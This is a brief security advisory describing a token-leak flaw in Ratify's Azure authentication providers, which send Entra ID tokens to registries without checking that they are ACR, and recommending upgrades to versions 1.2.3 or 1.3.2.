Binbin-Li

Name of the Vulnerable Software and Affected Versions: Ratify versions prior to 1.2.3 Ratify versions prior to 1.3.2 Description: The issue concerns a verification engine that enables the verification of artifact security metadata. In a Kubernetes environment, the engine can be configured to authenticate to a private Azure Container Registry (ACR) using Azure workload identity and Azure managed identity authentication providers. These providers attempt to exchange an Entra ID (EID) token for an ACR refresh token. However, they did not verify that the target registry is an ACR, which could lead to the EID token being presented to a non-ACR registry during token exchange. This could potentially allow EID tokens with ACR access to be extracted and abused if a user workload contains an image reference to a malicious registry. Recommendations: For versions prior to 1.2.3, update to version 1.2.3 or later to add new validation prior to EID token exchange. For versions prior to 1.3.2, update to version 1.3.2 or later to add new validation prior to EID token exchange. As a temporary workaround, consider restricting access to the Azure authentication providers until the issue is resolved. Avoid using image references to malicious registries to minimize the risk of exploitation.